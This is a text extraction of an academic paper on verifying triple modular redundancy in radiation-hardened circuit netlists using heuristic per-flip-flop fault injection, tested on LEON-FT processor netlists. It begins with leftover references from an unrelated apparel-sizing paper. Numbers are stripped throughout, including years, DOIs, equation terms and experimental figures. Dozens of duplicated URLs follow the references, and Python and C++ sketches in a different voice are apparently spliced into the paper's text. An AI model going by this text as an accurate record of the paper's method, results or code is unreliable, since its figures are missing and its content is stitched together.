looking for representative fit models for apparel sizing. decision support systems (january): – doi . /j.dss. . . . wold h. . partial least squares. in: samuel k, read cb, balakrishnan n, vidakovic b, johnson nl, eds. encyclopedia of statistical sciences. hoboken: john wiley & sons, inc. zhang j-t, novak ac, brouwer b, li q. . concurrent validation of xsens mvn measurement of lower limb joint angular kinematics. physiological measurement ( ): – doi . / - / / /n . baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . / - / / /n http://dx.doi.org/ . /peerj-cs. triple modular redundancy verification via heuristic netlist analysis submitted may accepted august published august corresponding author giovanni beltrame, giovanni.beltrame@polymtl.ca academic editor mary sheeran additional information and declarations can be found on page doi . /peerj-cs. copyright beltrame distributed under creative commons cc-by . open access triple modular redundancy verification via heuristic netlist analysis giovanni beltrame polytechnique montréal, montréal, québec, canada abstract triple modular redundancy (tmr) is a common technique to protect memory elements for digital processing systems subject to radiation effects (such as in space, high-altitude, or near nuclear sources). this paper presents an approach to verify the correct implementation of tmr for the memory elements of a given netlist (i.e., a digital circuit specification) using heuristic analysis. the purpose is detecting any issues that might incur during the use of automatic tools for tmr insertion, optimization, place and route, etc. our analysis does not require a testbench and can perform full, exhaustive coverage within less than an hour even for large designs. this is achieved by applying a divide et impera approach, splitting the circuit into smaller submodules without loss of generality, instead of applying formal verification to the whole netlist at once. the methodology has been applied to a production netlist of the leon -ft processor that had reported errors during radiation testing, successfully showing a number of unprotected memory elements, namely flip-flops. subjects computer aided design, computer architecture, embedded computing keywords single event effects, triple modular redundancy, verification introduction at high altitude or in space, without the protection of the earth’s magnetic field and atmosphere, integrated circuits are exposed to radiation and heavy ion impacts that can disrupt the circuits’ behavior. this paper focuses on single-event-upsets (seus), or soft errors, usually caused by the transit of a single high-energy particle through the circuit. in particular, we consider single bit flips in memory elements embedded in logic, implemented as flip-flops. protection against seus can be obtained in several ways, and in particular this work considers the protection strategy based on the triplication of the storage elements of a circuit, combined with majority voting (carmichael, ), usually referred to as triple modular redundancy (tmr). tmr can be either implemented during high level design (habinc, ) or at a later stage by automatic netlist modification. typically, after a new radiation-tolerant asic is produced, it undergoes a strict test campaign, including costly and time consuming radiation tests using particle accelerators. 
when a problem linked to the radiation effects protection logic arises during a radiation test campaign, it is already too late; the first prototype asics have been manufactured and the whole fabrication process needs to be rerun. detecting this kind of problems before fabrication is key, therefore several
on the other hand, some tools use special hardware to speed up the simulation cycle, such as ft-unshades (aguirre et al., ), which uses partial reconfiguration of an fpga to quickly introduce bit-flips (simulating seus) without requiring modifications of the dut. although this provides a consistent speedup compared to the software based approach, it is still unfeasible to run exhaustive verification of a typical asic design in full, which would require the injection of bit flips in all possible flip-flops (ffs) at any possible time during the simulation. it is also worth noting that the results of these approaches and how they can be interpreted strongly depend on the testbench used. beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. formal verification against soft-errors was introduced by (seshia, li & mitra, ): the idea is to merge a formal model of the dut with a soft error model, proving a given set of properties on the merged model. this requires a formal model of the dut and a complete and exhaustive set of formally defined properties to be proven. in other words, the main issue of this formal approach is that the coverage is as good as the definition of such properties. this work tries to overcome these limitations and provide full verification of a tmr-based dut with reasonable analysis time. the idea presented in this paper can be classified as a fault-injection simulation, but follows a different approach as compared to previous work: instead of trying to simulate the whole circuit at once and doing a timing accurate simulation, we focus on a behavioral, timeless, simulation of small submodules, extracted by automatic analysis of the dut internal structure, with the specific goal of detecting any triplicated ff that is susceptible to the propagation of seus in the dut. proposed approach the starting point of our analysis is a radiation hardened circuit, protected by triplication of storage elements and voting (tmr in carmichael ( )). our objective is to verify that indeed all ffs are adequately protected, and no issues were introduced, for example, by synthesis or routing tools. starting from a given design with n ffs, a naive testing approach for seu-sensitive ffs would require injecting faults in all n possible ff configurations, for all of the m time instants of a given testbench. this would lead to an impractically long simulation time, as typical systems consist of several thousand ffs. our approach performs a behavioral fault injection, splitting the whole system into smaller submodules, that can be analyzed independently, allowing full verification to be carried out in a reasonable timeframe. these submodules are the logic cones driving each ff. a logic cone is a set of com- binational logic bounded by ffs and i/o (see fig. ). to verify that no ff are sensitive to seus (therefore assuring the correct tmr implementation), it is possible to extract its driving logic cone, and perform an exhaustive fault injection campaign. this means that the ffs bounding the logic cone are injected single bit flips in all possible input configurations, comparing the output of the logic cone with its expected (i.e., fault-free) one. it is also necessary to verify that all the triplicated ffs have separate asynchronous reset and set lines, otherwise a transient on one of these lines might still cause a failure in the circuit. 
testing all possible configurations for a logic cone means 2^nf injections, with nf the number of driving flip-flops, making the analysis difficult or impossible for high nf. when tmr is applied to each memory element, nf increases by a factor of three in each logic cone, and the cone itself is modified to account for the voting logic, as shown in fig. . however, when a tmr implementation is present, each logic cone is driven by triplets of flip-flops and fig. shows how this restricts the number of input configurations that are actually valid for the cone, as all ffs belonging to the same triplet share the same value during normal operation of the circuit. the proposed algorithm, considering only valid configurations when performing fault injection, reduces the number of injections to the order of nf · 2^(nf/3), with nf the number of driving ffs for each logic cone. figure a logic cone is a set of logic bounded by ffs and i/o. when tmr is applied, each logic cone contains part of the voting logic. figure a logic cone where ff triplets have been identified: the valid configurations are shown. this results in a considerable analysis speed-up: fig. shows the trend for the number of injections needed as nf increases. figure trend for the number of checks needed for a logic cone as the number of driving ffs increases (x-axis: number of ffs; y-axis: number of injections, log scale; series: tmr not identified, tmr identified). the methodology here presented relies on some assumptions: the whole circuit is driven by only one clock and there are no combinatorial loops. furthermore, it is assumed that there are no signal conflicts inside the netlist (i.e., two-valued logic) and that there are no timing violations. finally, we assume that all ffs have one data input and one clock source. mathematical model to describe the algorithm, we need to introduce a special directed graph structure. the nodes of this graph have indexed inputs and are associated to a logic function and a value, as outlined in the following. we assume without loss of generality that every gate has just one output. gates that have n ≠ 1 outputs are converted into n nodes having the same inputs, each representing one output. taking this into account, the netlist can be easily converted into a directed graph structure. definition a circuit graph g is defined as a tuple {v, e, s, f}, where: • v is a set of nodes (representing logic gates) • e ⊆ v × v × n is a set of edges (representing interconnection wires) • s ⊆ v × {0, 1} is a set of values (representing the node values) • f ⊆ v × t is the set of logic functions associated to each node, where t is the set of computable boolean functions. every node v ∈ v has one outgoing edge and num_inputs(v) ∈ n inputs. the set of valid input indices for a node v ∈ v is given by nv = {1, ..., num_inputs(v)}. an edge e = (x, y, i) ∈ e with x, y ∈ v and i ∈ ny represents a connection from node x to the input i of node y.
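a small python rendering of this graph structure (an illustrative sketch; the field and helper names are mine, not the paper's implementation) could look as follows:

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

@dataclass
class Node:
    """one gate, ff or i/o node of the circuit graph."""
    name: str
    is_ff: bool = False
    func: Optional[Callable[..., int]] = None   # boolean function of the indexed inputs (None for ffs)
    value: int = 0                              # stored value, only meaningful for ffs
    inputs: Dict[int, "Node"] = field(default_factory=dict)   # input index -> driving node

def connect(src: Node, dst: Node, index: int) -> None:
    """edge (src, dst, index): src drives input `index` of dst."""
    dst.inputs[index] = src

def pre(x: Node) -> List[Node]:
    """direct predecessors of x."""
    return list(x.inputs.values())

# tiny example: two ffs driving an and gate
ff_a, ff_b = Node("ff_a", is_ff=True, value=1), Node("ff_b", is_ff=True, value=0)
g = Node("and1", func=lambda a, b: a & b)
connect(ff_a, g, 1)
connect(ff_b, g, 2)
print([n.name for n in pre(g)])   # ['ff_a', 'ff_b']
```

each ff node keeps its stored value, while combinational nodes carry the boolean function used by the eval operator defined next.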
assuming that the input circuit is free of driving conflicts, the circuit graph fullfills the property: ∀v,w,x ∈ v ,∀i ∈ nv : v ≠ w∧(w,x,i) ∈ e h⇒ (v,x,i) ∉ e which means that any given input of a node is connected to a single node output. we also assume that there are no unconnected inputs in the circuit, which translates to the beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. property: ∀x ∈ v ,∀i ∈ nx,∃w ∈ v : (w,x,i) ∈ e. ( ) to describe the algorithm, we need to define predicates that represent node properties. definition the set of direct predecessors of node x, i.e., the set of nodes with a direct connection from their output to one of x inputs is defined as: pre(x) ={w | ∃i ∈ nx : (w,x,i) ∈ e}. definition let us define the predicate is f f for a given node x ∈ v , which determines if x represents a ff: is f f (x) =  true if x ∈ v is a ff or in-/output node false else for the sake of simplicity, top-level in-/outputs are considered as ffs with no inputs. the set of nodes that represent ffs is: vff ={x | ∀x ∈ v ,is f f (x)}. definition we define the set of nodes which are directly and indirectly connected to the inputs of a given node x ∈ v as the smallest set pre f fs(x) for which the following properties hold∀w ∈ pre(x): is f f (w) h⇒ w ∈ pre f fs(x) ¬is f f (w)∧v ∈ pre f fs(w) h⇒ v ∈ pre f fs(x). having assumed that each ffs has one input, we can define the driving node for a given ff as definition a driver for ff x ∈ vff is defined as: driver(x) ={y | (y,x, ) ∈ e}. finally, we need the operators to compute the values associated to each node: definition the value of a node x ∈ v is given by the eval operator, defined as: eval(x) =  evalff(x) if x ∈ vff evall(x) else where evalff returns the value stored in ff x: evalff(x) ={a | (x,a) ∈ s} beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. and evall computes the value of logic (i.e., non ff) nodes, which depends on the node input values: evall(x) ={f (eval(y ),...,eval(yn)) | (x,f ) ∈ f,yi ∈ pre(x)} we also define the configuration of a set of ffs{x ,x ,..xn}∈ vff as config(x ,...,xn) = (eval(x ),...,eval(xn)). a configuration config(x ,...,xn) is defined as valid when two ffs driven by the same logic value share the same value for all configurations: ∀x ,...,xn ∈ vff,∀i ∈ nxi ,∀j ∈ nxj : driver(xi) ≡ driver(xj) h⇒ eval(xi) = eval(xj) with≡being defined as functionally identical (see definition ). the proposed methodology is composed of steps: . triplet identification: determine all the ff triplets present in each logic cone . tmr structure analysis: perform an exhaustive fault injection campaign on all valid configurations . clock and reset tree verification: assure that no ff triplet has common clock or set/reset lines these steps are detailed in the following. triplet identification to determine a useful set of valid configurations for a logic cone (here represented by a subgraph), it is necessary to identify which ffs are triplicated, as all the ffs belonging to a triplet have to share the same value. however, the gate naming scheme is usually insufficient. a base assumption for triplet identification is that all triplicated ffs are driven by the same source. an algorithm based on this fact is able to find most triplets, but this simple mechanism is not always sufficient for more complex netlists. during synthesis, netlists are often optimized in a way that voids this property. 
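the "same driving source" grouping just described can be sketched in a few lines (all names below are made up); the second register in the toy netlist shows how a partially duplicated voter escapes this naive grouping, which is exactly why the functional-identity heuristic discussed next is needed.

```python
from collections import defaultdict

def group_triplets_by_driver(driver_of: dict) -> list:
    """naive triplet identification: group ffs that share the same driving node.

    driver_of maps each ff name to the name of the node feeding its data input.
    this is only the 'base assumption' grouping; synthesis optimizations that
    duplicate part of the voter logic will break it.
    """
    groups = defaultdict(list)
    for ff, driver in driver_of.items():
        groups[driver].append(ff)
    return [ffs for ffs in groups.values() if len(ffs) == 3]

# toy netlist: one cleanly triplicated register and one whose voter was partially duplicated
drivers = {
    "r0_ff_0": "voter_r0", "r0_ff_1": "voter_r0", "r0_ff_2": "voter_r0",
    "r1_ff_0": "voter_r1", "r1_ff_1": "voter_r1", "r1_ff_2": "voter_r1_dup",
}
print(group_triplets_by_driver(drivers))   # [['r0_ff_0', 'r0_ff_1', 'r0_ff_2']]
```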
The figure below shows an example: a voter was partially duplicated using other logic elements, with the duplicated OR and NOT gates delivering the same values for all configurations of the driving FFs, thus leaving one FF of the triplet with a different set of inputs with respect to the other members. The synthesizer introduces this redundancy for delay optimization, place-and-route constraints, etc. Therefore, we assume that two FFs belong to one triplet if they are both driven by functionally identical nodes.

Definition: Two nodes x_1 and x_2 are functionally identical (x_1 ≡ x_2) if pre_ffs(x_1) = pre_ffs(x_2) and eval(x_1) = eval(x_2) for all possible configurations of pre_ffs(·).

Testing for functionally identical inputs requires equivalence checking (Thornton, Drechsler & Gunther) of the logic functions expressed by the nodes. For the sake of simplicity we implemented a simple checker that exhaustively compares all possible input configurations for the two nodes.

Figure: a sample graph with FF triplets and voters after optimization.

Checking the equivalence between two nodes might be impractical, as the problem grows exponentially (roughly 2^|pre_ffs(x)|). However, wrong triplet identification affects the verification of TMR protection only with the reporting of false positives, i.e., reporting a faulty triplicated structure when none exists. Therefore, we propose a heuristic algorithm in three steps (it is worth noting that other algorithms for functional equivalence checking could be used here). Let us consider the example in the figure above, where the algorithm is applied to two FFs of the same nominal triplet (x and y in the algorithm, respectively). Two sub-algorithms are needed:

Definition: mark_graph(x) traverses the graph starting at node x and marks all visited nodes, stopping at FFs. Its behavior is formalized in the mark_graph listing below.

Definition: find_marked(y, x) traverses the graph depth-first starting from y until a FF is encountered and returns all the nodes that were found as marked by x. Its behavior is formalized in the find_marked listing below.

The first step checks the sets of driving FFs for equality before starting from x and traversing the graph depth-first, marking all visited nodes (shown as a second circle in the figure), until a FF is visited and marked. In a second step the algorithm starts again from y and traverses the graph until reaching a marked node. If an unmarked FF is traversed, this shows that x and y are not functionally identical in the same clock cycle, and the algorithm aborts (assuming no FFs were duplicated during optimization). After terminating successfully, the algorithm returns the set of marked nodes; for the example in the figure, this would be the two shared AND gates and the shared FF. The third step verifies that all configurations for this set produce the same values for x and y. This is done by assigning all possible configurations to this set and evaluating the subgraphs for x and y to compare the results. Checking all possible configurations, as opposed to only valid ones, might result in functionally identical nodes not being recognized. Instead of drawing a sharp yes/no conclusion, the number of matching configurations is compared for all possible triplet allocations, and the best one is used to assign the FFs.
In other words, the nodes x_i and x_j are assigned to the same triplet for which i and j (i ≠ j) result in the largest number of matching configurations.

Function: functionally_identical(x, y)
  Input: nodes x, y ∈ V
  Output: number of matching configurations ∈ ℕ
  if pre_ffs(x) ≠ pre_ffs(y) then
    return 0
  end
  mark_graph(x)
  (v_1, ..., v_k) ← find_marked(y, x)
  count ← 0
  foreach c ∈ config(v_1, ..., v_k) do
    for i ← 1 to k do
      value(v_i) ← c_i
    end
    if eval(x) = eval(y) then
      count ← count + 1
    end
  end
  return count

Function: mark_graph(x, marker)
  Input: a node x ∈ V
  Input: a node marker ∈ V
  last_visit(x) ← marker
  if is_ff(x) then
    return
  else
    foreach child ∈ pre(x) do
      mark_graph(child, marker)
    end
  end

Function: find_marked(x, marker)
  Input: a node x ∈ V
  Input: a node marker ∈ V
  Output: a set of nodes (r_1, ..., r_n), r_i ∈ V
  if last_visit(x) ≠ marker then
    return ∅
  else
    result_set ← (x)
    foreach child ∈ pre(x) do
      rek ← find_marked(child, marker)
      result_set ← result_set ∪ rek
    end
    return result_set
  end

It is worth noting that the worst-case scenario for this fast heuristic, i.e., when all FFs are reported as false positives, is when both subgraphs share only the driving FFs and the whole subgraph is duplicated. This is unlikely to happen when analyzing real-world netlists, because synthesizers optimize away most redundant parts and introduce redundancy only in rare cases. For the designs used in this work, the non-shared subgraph size is typically less than nine gates.

TMR structure analysis

Before starting the analysis, we optimize our description by removing non-relevant elements, such as one-to-one buffer gates. As such buffers do not manipulate the logic value of a signal, it is easy to see that the logic functions are not changed when they are removed. If the TMR implementation is working correctly, a single bit-flip in one FF should not cause another FF to change its value. If a faulty triplicated FF/voter pair exists, there is at least one FF whose value can be changed by a single bit-flip in another FF. This is true only if the configuration before the bit-flip injection was a valid configuration. The algorithm tries to find such FFs, and if none are found, TMR is correctly implemented.

The main idea of the test algorithm is that complexity can be reduced by checking only small submodules instead of the whole system. In order to do this, we observe that a bit-flip in one FF can only propagate to the next FF during the current clock cycle. It is then possible to determine the set of all FFs which could potentially influence a given FF x ∈ V_FF, i.e., pre_ffs(x), the FFs driving x's logic cone. The algorithm takes each FF x_i, determines the set of FFs driving its logic cone, and tests every possible bit flip for every possible valid configuration. If any of these bit flips is able to change x_i's stored value, then the algorithm has detected a fault in the TMR implementation. More formally, the analyze listing below describes this behavior in pseudocode (where abort interrupts execution and shows a message to the user).
Function: analyze(x)
  Input: a node x ∈ V
  (y_1, ..., y_k) ← pre_ffs(x)
  foreach valid c ∈ config(y_1, ..., y_k) do
    for i ← 1 to k do
      value(y_i) ← c_i
    end
    init_value ← eval_ff(x)
    foreach 1-bit mutation c′ of c do
      for i ← 1 to k do
        value(y_i) ← c′_i
      end
      mut_value ← eval(x)
      if mut_value ≠ init_value then
        abort("FF x sensitive to SEUs")
      end
    end
  end

As the analysis has to be performed for all x ∈ V_FF, analysis times might be excessively long. To reduce runtime, this algorithm has to be extended to handle large sets of driving FFs (y_1, ..., y_k). If the number of elements t = |pre_ffs(x)| in such a set exceeds a given threshold, the graph will be split into smaller subgraphs until the threshold is reached, as outlined in 'Splitting algorithm'.

Splitting algorithm

Analyzing typical designs with the proposed algorithm showed that the majority of FFs are driven by a very small set of FFs pre_ffs(x) (see the figure on subgraph sizes below). However, there are a few FFs that are driven by a large number of FFs (for some designs, considerably more). Those subgraphs cannot be analyzed directly, as they would require an exponential number of configurations to be evaluated, and heuristics have to be devised.

A naive approach would use "divide et impera", splitting every node where |pre_ffs(y_i)| > threshold, starting from the FF to be analyzed. (It is worth noting that the count returned by functionally_identical is not what is used here as a threshold: here we consider only the number of driving flip-flops, and not the number of matching configurations between two logic cones.) This approach works for most FFs, but it fails if the synthesizer merged a voter with other logic during optimization. As an example, the three-input OR gate of a voter might be merged with a following OR gate into a single wider OR gate. Splitting could break the voter and result in a false positive alert.

Function: split_analyze(x)
  Input: a node x ∈ V
  split_required ← false
  foreach child ∈ pre(x) do
    if |pre_ffs(child)| > threshold then
      replace_input(x, child, dummy)
      split_analyze(child)
      split_required ← true
    end
  end
  if split_required then
    (d_1, ..., d_k) ← get_dummynodes(x)
    foreach c ∈ config(d_1, ..., d_k) do
      for i ← 1 to k do
        value(d_i) ← c_i
      end
      analyze(x)
    end
  else
    analyze(x)
  end

Let child_i be the nodes connected to the inputs of node x. To avoid breaking voting logic, instead of splitting using the threshold only, the originating node is kept and the subgraphs for the nodes child_i with |pre_ffs(child_i)| > threshold are replaced by dummy input nodes (see the split_analyze listing). Every node child_i is tested recursively according to the algorithm with the divide-et-impera approach. Afterwards, all possible bit configurations are assigned to the dummy inputs connected to x. Analyzing x for such configurations ensures that x is tested for all possible substates previously generated by the removed nodes child_i.

It is worth noting that this heuristic relies on the fact that synthesizers tend to keep the voting logic close to the originating FFs, and therefore splitting subgraphs with a large number of inputs usually does not result in voters being broken. However, it cannot be excluded that some voting logic might be broken, resulting in some rare false positive alerts (see 'Experimental results'). This will never hide any SEU-sensitive parts: if TMR is not properly implemented, this will be detected. In case the algorithm reports a SEU-sensitive FF, testing with a higher threshold value or manual inspection can identify whether it represents a false positive.
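Putting the pieces of 'TMR structure analysis' together, the core per-FF check can be sketched as follows: enumerate only the valid configurations of the driving triplets, inject one bit-flip at a time, and report the FF as sensitive if the value it would latch changes. This is an illustrative sketch under the structures assumed in the earlier fragments (eval and driving_triplets are assumed helpers), not the actual infault implementation, and it omits the subgraph splitting.

```cpp
// Sketch of the per-FF check over valid configurations only: the FFs driving
// x's logic cone are grouped into triplets, every member of a triplet gets the
// same value, and single bit-flips are then injected one at a time. If any
// flip changes the value x would latch, x is reported as SEU-sensitive.
#include <cstddef>
#include <cstdint>
#include <vector>

bool eval(Node* x);                                         // assumed helper: evaluate a node's value
std::vector<std::vector<Node*>> driving_triplets(Node* x);  // assumed helper: pre_ffs(x) grouped into triplets

bool is_seu_sensitive(Node* x) {
    std::vector<std::vector<Node*>> triplets = driving_triplets(x);
    const std::size_t t = triplets.size();
    Node* cone = x->inputs[0];                              // logic cone feeding the FF's data input
    for (std::uint64_t c = 0; c < (1ull << t); ++c) {       // 2^t valid configurations
        for (std::size_t i = 0; i < t; ++i)
            for (Node* ff : triplets[i])
                ff->value = ((c >> i) & 1u) != 0;           // triplet members share the same value
        const bool init_value = eval(cone);
        for (std::size_t i = 0; i < t; ++i) {               // one bit-flip at a time
            for (Node* ff : triplets[i]) {
                ff->value = !ff->value;
                const bool mutated = eval(cone);
                ff->value = !ff->value;                     // undo the flip
                if (mutated != init_value) return true;     // voting logic failed to mask the flip
            }
        }
    }
    return false;
}
```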
Clock and reset tree verification

Verifying that the voters are correctly performing their task is not sufficient to guarantee that TMR structures are working. One also needs to show that transient errors on clock and reset lines are not affecting more than one FF at a time. The figure below shows how a shared reset line might result in SEU-like behavior, as a transient on the line affects more than one FF. This could happen if the FFs shared a common asynchronous reset or clock line: in this case, a bit flip might zero the entire triplet, or force the FFs to sample the wrong value. To guarantee that TMR structures are functioning, it is then necessary to rule out this possibility. Using the detected triplets, it is possible to verify that FFs belonging to the same triplet do not share the same clock and reset lines. This is a simple structural analysis that does not require a heuristic to be performed.

Figure: a shared reset line in a TMR triplet might cause issues in case of transients, as two FFs might be affected simultaneously.

Algorithm complexity analysis

Given m = |V| and n = |V_FF|, being the total number of gates and FFs respectively, a naive exhaustive search would result in 2^n possible FF configurations to test, requiring O(m·2^n) node evaluations. Determining a subgraph to be analyzed for every node x ∈ V_FF gives n subgraphs to verify. Using the properties presented in 'TMR structure analysis', the algorithm has to check p_x = |pre_ffs(x)| FFs, with typical designs showing that in general p_x ≪ n. As described in 'Splitting algorithm', the algorithm limits p_x to a given threshold t by splitting the graph into subgraphs. Therefore, there are fewer than 2^t valid configurations to evaluate for every subgraph (assuming FF triplication, we expect fewer than 2^(t/3) valid configurations). As we are testing one bit-flip at a time, we need to perform t injections on every valid configuration. Obviously, the number of subgraphs obtained after splitting and their sizes cannot exceed the total number of gates m, resulting in fewer than n · 2^t · t · m subgraph evaluations. Overall, the algorithm performs O(nm²) node evaluations for a fixed threshold t, showing polynomial behavior and outperforming other exponential verification methods.

Experimental results

The algorithm presented in 'TMR structure analysis' was implemented as a C++ program called infault. The graph is obtained in two steps: first, a given Verilog netlist is converted into an intermediate file format, which is then read and analyzed by infault. This separation makes the parser independent from the main program, allowing easy development of parsers for different input files.

Table: runtime comparison between FT-UNSHADES and infault with two threshold values; times in minutes (m), hours (h), and days (d). Testcases: resetgen, pci_mas, pci_tar, mctrl, fpu, amod, iu, pci. Columns: number of gates (after mapping the library to standard logic cells), number of FFs, FT-UNSHADES time (not exhaustive), infault time at each of the two thresholds, and false positives (same results for both thresholds).
The graph itself was implemented in a custom structure, using pointers whenever possible and STL (Silicon Graphics) maps, vectors, and sort algorithms to maximize speed. In order to be ASIC-library independent, the parser is able to read library cell definitions and design netlists, and to map all custom ASIC cells to standard gates (AND, OR, ...). If the ASIC library makes use of non-standard cells, the parser and infault can be easily enhanced. The tool requires no user input during runtime, and shows status information such as the overall progress, which gate is being processed, etc.

The implementation was tested on the submodule netlists of a radiation-hardened LEON-FT processor (Gaisler). The table above shows the results of our tests with two threshold values, and compares the runtime with the expected runtime of FT-UNSHADES (Aguirre et al.). All tests were performed on an Intel Core Duo workstation. Although FT-UNSHADES is not designed for full test coverage, the table gives an idea of the performance of the algorithm over a brute-force approach. It is worth noting that infault does not need a testbench to provide results, since it performs a static analysis of the LEON-FT gate-level netlist. However, to compare our results with FT-UNSHADES, we had to select a set of benchmarks. The runtime for the FT-UNSHADES test was calculated based on measurements on smaller tests, using a testbench with a fixed number of clock cycles and injecting into every possible FF, assuming a faster-than-real runtime on the order of milliseconds for each test. These testbenches come directly from Gaisler Research, and are made with high code coverage in mind; therefore, they were considered a good choice to stimulate every part of the processor. It is worth noting that this short testbench duration cannot cover all possible internal substates, therefore resulting in a non-exhaustive test. A testbench that covers all internal substates is hard or even impossible to find, and the simulation time would be so high as to render the analysis impractical.

Comparing infault to an exhaustive approach, for example on the PCI submodule, the module is verified with a number of node evaluations that is orders of magnitude smaller than a naive approach would require, showing that infault provides orders of magnitude of speedup.

As the actual runtime of infault depends on the choice of the threshold presented in 'Splitting algorithm', we tested several threshold values to determine the speed of the algorithm. In general, smaller thresholds result in shorter runtimes, with the drawback of more false positive alerts because of voters that have been broken during subgraph splitting. False positives have to be analyzed by manual graph inspection, or with other means.

Figure: runtime and false positive count with increasing threshold.

The figure shows how overall runtime and number of false positives vary with increasing threshold, for all nine netlists of the LEON-FT processor. As the threshold increases, the sum of false positives over the nine designs drops considerably, while the overall runtime grows from minutes up to hours; for the suggested threshold, the runtime is around a few tens of minutes.

To show the effectiveness of the subgraph splitting, the algorithm was tested on the nine netlists, logging the different subgraph sizes before and after splitting at a fixed threshold.
Please note that the runtime strongly correlates with the internal structure of the design, especially the subgraph sizes, and is therefore subject to fluctuations among the designs.

Figure: size classification of subgraphs (number of driving FFs per subgraph) before and after splitting.

The figure shows the results of this test. Before splitting, there is a significant number of subgraphs with a large set of driving FFs; assuming correct triplication, this would result in far too many valid configurations to be checked for each of those nodes, making the splitting heuristic an essential component of our approach. After splitting, the situation is completely different: even though splitting results in many more subgraphs to be checked, the subgraph sizes are much smaller, no subgraph exceeds the threshold on the number of driving gates, and the number of valid configurations per subgraph stays correspondingly small. It is worth noting that the results depend on the complexity of the circuit, since the effectiveness of the splitting algorithm varies with the number of driving FFs; infault might not show the same performance on other processors with very complex multi-layer logic.

To show its fault-detecting capabilities, infault was verified on a netlist (module iu in the table above) with deliberately broken voters. The netlist used for this test contains a large number of triplets. For the test run, a set of triplets was automatically selected and their voters manipulated by changing the voter function from f(x1, x2, x3) = (x1 ∧ x2) ∨ (x1 ∧ x3) ∨ (x2 ∧ x3) to f(x1, x2, x3) = x1 ∨ x2 ∨ x3. This should result in three SEU-sensitive FFs being detected per manipulated triplet. infault reported problems in all of the unprotected triplets, plus one false positive.

Finally, the methodology was applied to a production netlist of the LEON-FT processor that had reported failures due to SEUs after manufacturing, during a radiation test campaign. The algorithm reported common reset lines for triplicated FFs. An SEU on these lines is consistent with the behaviour shown by the processor during radiation testing. These errors were introduced by the automated tools in charge of inserting TMR structures in the LEON-FT processor, during the optimization phase. After correcting the netlist, with the proposed methodology reporting no remaining issues, the processor was irradiated further.
future work includes replacing the actual simulation/injection step with the identifica- tion of triplets followed by formal verification of the correct propagation of flip-flop values through the voting logic. acknowledgements the author would like to thank simon schulz and david merodio-codinachs for the help provided in the development of infault. additional information and declarations funding the author received no funding for this work. competing interests the author declares there are no competing interests. author contributions • giovanni beltrame conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding the availability of data: http://github.com/mistlab/infault. references aguirre m, tombs jn, baena-lecuyer v, muñoz f, torralba a, fernández-león a, tortosa-lópez f. . ft-unshades: a new system for seu injection, analysis and diagnostics over post synthesis netlist. in: mapld’ , nasa military and aerospace programmable logic devices. available at http://klabs.org/mapld /abstracts/ aguirre a. html. boué j, pétillon p, crouzet y. . mefisto-l: a vhdl-based fault injection tool for the experimental assessment of fault tolerance. in: fault-tolerant computing, . digest of papers. beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html 
Carmichael C. Triple module redundancy design techniques for Virtex FPGAs (Xilinx application note XAPP). San Jose: Xilinx Inc. Available at http://www.xilinx.com/support/documentation/application_notes/xapp .pdf.

Gaisler J. The LEON IEEE-1754 (SPARC V8) processor. Available at http://www.gaisler.com.

Goswami KK, Iyer RK, Young L. DEPEND: a simulation-based environment for system-level dependability analysis. IEEE Transactions on Computers.

Habinc S. Functional triple modular redundancy. Technical report. Göteborg: Gaisler Research. Available at http://www.gaisler.com/doc/fpga_ _ - - .pdf.

Kanawati G, Abraham J. FERRARI: a flexible software-based fault and error injection system. IEEE Transactions on Computers.

Maestro JA. SST user manual. Universidad Antonio de Nebrija. Available at http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf.

Seshia SA, Li W, Mitra S. Verification-guided soft error resilience. In: Proceedings of the Design, Automation and Test in Europe Conference (DATE). Piscataway: IEEE.

Silicon Graphics. Standard Template Library, SGI [online]. Milpitas: Silicon Graphics. Available at http://www.sgi.com/tech/stl.

